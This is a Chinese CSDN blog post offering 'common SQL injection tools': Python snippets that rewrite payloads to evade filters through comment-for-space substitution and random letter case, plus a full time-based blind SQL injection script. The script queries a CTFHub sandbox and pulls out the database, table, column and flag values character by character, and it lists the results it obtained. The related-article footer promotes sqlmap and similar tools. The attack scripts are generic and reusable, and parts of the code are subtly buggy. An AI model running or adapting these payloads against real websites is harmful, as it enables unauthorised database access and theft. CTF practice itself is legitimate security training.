web---SQL注入的常用工具

最新推荐文章于 2024-05-09 09:11:23 发布
最新推荐文章于 2024-05-09 09:11:23 发布
阅读量758 收藏
点赞数 1
分类专栏: web相关 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44418229/article/details/124620521
版权

1.替换空格

利用python的正则匹配来实现

a=input("字符串:")
a=a.replace(' ','/**/')
print(a)

2.字符随机大小写

# 模板位置:file,setting。Editor。file and Code Templates
import random
a=random.randint(0,2)
#A:65
#a:97,z:123
#所有能用的字符为33-127
#ord()获取ascii的值

b=input("输入字符串:")
count=len(b)
i=0
result=""
while i<count:
    if b[i]!=' ':#非空格
        ascii1=ord(b[i])
        if ascii1<97 | ascii1>123:#非字母,保留不动
            result+=b[i]
            i+=1
        else:
            a=random.random()
            if a>0.5:
                """
                temp=ord(b[i])-32
                result+=chr(temp)
                """
                result+=b[i].upper()
                i+=1
            else:
                result+=b[i]
                i+=1
    else:#等于空格
        result+=' '
        i+=1
print(result)

3.时间盲注

注意:需要替换base_url

函数需要一个一个调用

# 模板位置:file,setting。Editor。file and Code Templates
import requests
import time
base_url="http://challenge-5a36cec53d8acb57.sandbox.ctfhub.com:10800/?id="
#数据库名的长度
def database_length():
    #select * from news where id=     1 and sleep(1)
    #0 的时候就不行
    for i in range(1,45):
        #1+and+length%28database%28%29%29+%3D+4+and+sleep%283%29
        url=base_url+"0/**/and/**/if((length(select database()))={},sleep(2),1)".format(i)
        start_time = time.time()
        response = requests.get(url)
        end_time = time.time()
        if(end_time - start_time > 2): #说明是对的
            return i
#数据库长度是4
#查数据库的名字
def database_name(length_database):
    #截取一个字符,如果是对的就跳到下一个字符
    #字符范围为0-9,a-z,A-Z
    ran="abcdefghijklmnopqrstuvwxyz"
    result=""
    for i in range(1,length_database+1):#控制第几个字符
        for j in range(33,124) :
            #ascii(substr(database(),{i},1))={j}
            url = base_url+"1%20and%20if(ascii(substr(database(),{},1))={},sleep(4),1)".format(i,j)
            start_time = time.time()
            response = requests.get(url)
            end_time = time.time()
            #print(i,j)
            if(end_time - start_time > 3):
                result+=chr(j)
                print("result:",result)
                i+=1
#数据库名为sqli
#跑表名,将表名用group_concat连接后再跑
#表长度
#select group_concat(table_name) from information_schema.tables where table_schema = database()
#length(select group_concat(table_name) from information_schema.tables where table_schema = database())={}
def table_count():
    i=0
    while True :
        #'?id=1 and if((select count(*) from information_schema.tables where table_schema=database())={},sleep(0.5),1)'.format(i)
        url = base_url + '1 and if((select count(*) from information_schema.tables where table_schema=database())={},sleep(3),1)'
        real_url = url.format(i)
        start_time=time.time()
        response=requests.get(real_url)
        end_time=time.time()
        if(end_time-start_time>3):
            print("resutlt:",i)
            break
        else:
            print(i)
            i+=1
#两张表
#跑 表名长度
def table_length():
    #用group_concat连接再一起后测试长度
    #(select group_concat(table_name) from information_schema.tables where table_schema = database())
    #length()={}
    #if($,sleep(3),1)
    i=0
    while True:
        url=base_url+"1 and if(length((select group_concat(table_name) from information_schema.tables where table_schema = database()))={},sleep(3),1)"

        real_url = url.format(i)
        start_time = time.time()
        response = requests.get(real_url)
        end_time = time.time()
        if (end_time - start_time > 3):
            print("resutlt:", i)
            break
        else:
            print(i)
            i += 1
def table_name():
    result=""
    for i in range(1,10):#第n个字符
        for j in range(33,127):#ascii
            #if($,sleep(3),1)
            #ascii()={}
            #substr($,{},1)
            #(select group_concat(table_name) from information_schema.tables where table_schema=database())
            url=base_url+'1 and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))={},sleep(3),1)'
            real_url=url.format(i,j)
            start_time = time.time()
            response = requests.get(real_url)
            end_time = time.time()
            if (end_time - start_time > 3):
                result+=chr(j)
                i+=1
                j+=1
                print(result)
                break
            else:
                j+=1
#字段和表名一样,先跑长度后跑具体字符
def column_length():
    i=0
    while True:
        #if($,sleep(5),3)
        #length()={}
        #(select concat(column_name) from information_schema.columns where table_name='flag' and table_schema=database())
        url=base_url+"1 and if(length((select concat(column_name) from information_schema.columns where table_name='flag' and table_schema=database()))={},sleep(5),3)"
        real_url = url.format(i)
        start_time = time.time()
        response = requests.get(real_url)
        end_time = time.time()
        if (end_time - start_time > 3):
            print("resutlt:", i)
            break
        else:
            print(i)
            i += 1

def column_name():
    result=""
    for i in range(1,5):
        for j in range(33,127):
            #if((),sleep(3),1)
            #ascii()
            #substr((),{},1)
            #(select column_name from information_schema.columns where table_name='flag' and table_schema=database())
            url=base_url+"1 and if((ascii(substr((select column_name from information_schema.columns where table_name='flag' and table_schema=database()),{},1))={}),sleep(3),1)"
            real_url=url.format(i,j)
            start_time=time.time()
            response=requests.get(real_url)
            end_time=time.time()
            if(end_time-start_time>3):
                result+=chr(j)
                print(result)
#查数据:长度,具体字母
def flag_length():
    i=0
    while True:
        #if(()={},sleep(3),1)
        #length()
        #(select flag from flag)
        url=base_url+"1 and if((length((select flag from flag)))={},sleep(3),1)"
        real_url=url.format(i)
        start_time=time.time()
        response=requests.get(real_url)
        end_time=time.time()
        if(end_time-start_time>3):
            print(i)
            break
        else:
            i+=1
def flag_name():
    result=""
    for i in range(1,33):
        for j in range(33,127):

            #if((()={}),sleep(3),1)
            #ascii()
            #substr((),{},1)
            #(select flag from flag)
            url=base_url+"1 and if(((ascii(substr(((select flag from flag)),{},1)))={}),sleep(1),1)"
            real_url=url.format(i,j)
            start_time = time.time()
            response = requests.get(real_url)
            end_time = time.time()
            if (end_time - start_time > 1):
                result+=chr(j)
                print(result)
                break
database_length()



"""
a = database_length() 4
database_name(4) sqli
table_count() 2
table_length() 9
table_name() flag,news
column_length() 4
column_name() flag
flag_length() 32
flag_name() ctfhub{83ca0ed583c1d37f2ae0dbba}
"""

4.url输入注入命令

提前写好后,在下方网站中编码下

注意:#需手动修改为%23

URL在线编码转换工具 - 编码转换工具 - W3Cschool

jjj34
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sql注入工具sqlmap源代码+常用指令
04-09
SQLMap是一款流行的开源SQL注入工具,用于自动化检测和利用Web应用程序中的SQL注入漏洞。它可以测试目标站点是否存在SQL注入漏洞,并探测数据库类型、操作系统、表名、列名等信息,进而将这些信息自动化地利用来获取...
最受欢迎的十款SQL注入工具
2301_77472496的博客
08-28 4406
为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以点击免费领取(如遇扫码问题,可以在评论区留言领取哦)~《网络安全入门+进阶学习资源包》CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享网络安全源码合集+工具包​​。
10 个 SQL 注入工具(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
leah126的博客
05-09 1435
其主要的目标是在存在着漏洞的数据库服务器上提供一个远程的外壳,甚至在一个有着严格的防范措施的环境中也能如此。Havij不仅能够自动挖掘可利用的SQL 查询,还能够识别后台数据库类型、检索数据的用户名和密码hash、转储表和列、从数据库中提取数据,甚至访问底层文件系统和执行系统命令,当然前提是有 一个可利用的SQL注入漏洞。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
freeking101的博客
07-03 7784
SQL 注入 SQL注入就是通过把 SQL 命令插入到 Web表单提交 或 输入域名 或 页面URL请求查询的字符串,最终达到欺骗服务器执行恶意的 SQL命令,假如管理员没有对 id 参数进行过滤那么黑客可以通过数据传输点将恶意的SQL语句带入查询。 sqlmap sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据
SQL注入工具介绍——sqlmap
p36273的博客
08-01 1772
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。4、联合查询注入,可以使用union的情况下的注入。5、堆叠查询注入,可以同时执行多条语句的执行时的注入
网络安全培训视频教程-53.利用SQL注入漏洞入侵网站实例演示(下).rar
07-09
而且病毒不仅仅是造成互联网高危状态的主要因素,网络上同时也出现了许多简明的网络攻击教程,使一些不怀好意的人可以使用“黑客工具”,对个人PC及Web站点进行简单入侵。应与此情况,黑客动画吧积极配合互联网安全...
网络安全原理与应用:SQL工具注入.pptx
05-16
其中最常用SQL注入工具就是SQLMap。 下载地址:/sqlmapproject/sqlmap/legacy.zip/master SQL工具注入 一、SQL工具注入 2、python运行环境 由于SQLMap是采用python编写的,所以要运行SQLMap,需要安装python运行环境...
网络安全培训视频教程-51.SQL注入漏洞原理介绍.rar
07-09
而且病毒不仅仅是造成互联网高危状态的主要因素,网络上同时也出现了许多简明的网络攻击教程,使一些不怀好意的人可以使用“黑客工具”,对个人PC及Web站点进行简单入侵。应与此情况,黑客动画吧积极配合互联网安全...
免费开源的SQL注入工具SQLmap.zip
07-18
SQL注入是网站渗透中最常用的攻击技术,但是其实SQL注入可以用来攻击所有的SQL数据库。在这个指南中我会向你展示在Kali Linux上如何借助SQLMAP来渗透一个网站(更准确的说应该是数据库),以及提取出用户名和密码...
SQLiDetector:一款功能强大的SQL注入漏洞检测工具
u010291330的博客
03-25 1873
SQLiDetector是一款功能强大的SQL注入漏洞检测工具,该工具支持BurpBouty配置文件,可以帮助广大研究人员通过发送多个请求(包含14种Payload)并检查不同数据库的152个正则表达式模式来检测基于错误的SQL注入漏洞。我们还创建了一个BurpBounty配置文件,它会使用相同Payload并在不同的位置注入,例如:参数名、参数值、Header和路径。3、使用你的链接和URL工具获取所有的waybackurl,如waybackurl、gau、gauplus等;1、运行子域名搜索工具
Sqlmap(SQL注入自动化工具)
F2444790591的博客
07-16 3705
自动化SQL注入工具Sqlmap
2022 年不错的 SQL 注入 (SQLi) 检测工具
网络技术联盟站
02-07 3673
SQL 注入 (SQLi) 是一种可以访问敏感或私有数据的隐蔽攻击形式,它们最早是在上世纪末被发现的,尽管它们的年龄很大,但它们经常被用作黑客工具包中的一种有效技术。今天,给大家介绍一下顶级 SQLi 检测工具。 顶级 SQLi 检测工具 有很多 SQLi 检测工具,其中许多是开源的,可在 GitHub 上找到,除了专门的 SQLi 检测工具外,还有更大的套件和专有软件包将 SQLi 作为其整体漏洞检测功能的一部分。 Netsparker Netsparker是一个 Web 漏洞管理解决方案,其中包括 SQ
sql注入神器-sqlmap
siu~
08-24 451
SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。
Web安全:SQL注入工具
滴水石穿
06-17 7337
SQL注入工具主要是针对Web服务器后台数据库的注入,其主要目的是获取数据库中的数据。以前常用的SQL注入工具有啊D注入工具及Domain(明小子注入工具),现在常用的SQL注入工具有HackBar、SQLMap、Pangolin、Havij、Safe3 SQL injector及超级SQL注入工具等。 1、HackBar HackBar是专门用来进行手动安全测试的浏览器插件(例如手动测试SQL注入漏洞),如图1所示。 图1 HackBar 下载HackBar插件链接:https://git..
常用的渗透测试工具 ——SQLMap (安装教程&入门教程)
Spontaneous_0的博客
10-27 904
SQLMap是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB。SQLMap采用了以下5种独特的SQL注入技术。● 基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入
kali-linux 哪些工具比较常用
04-06
以下是一些常用的 Kali Linux 工具: 1. Metasploit:用于漏洞利用和渗透测试。 2. Nmap:用于扫描网络和主机以获取信息。 3. Aircrack-ng:用于无线网络安全测试和破解。 4. Wireshark:用于网络协议分析和故障...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jjj34

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值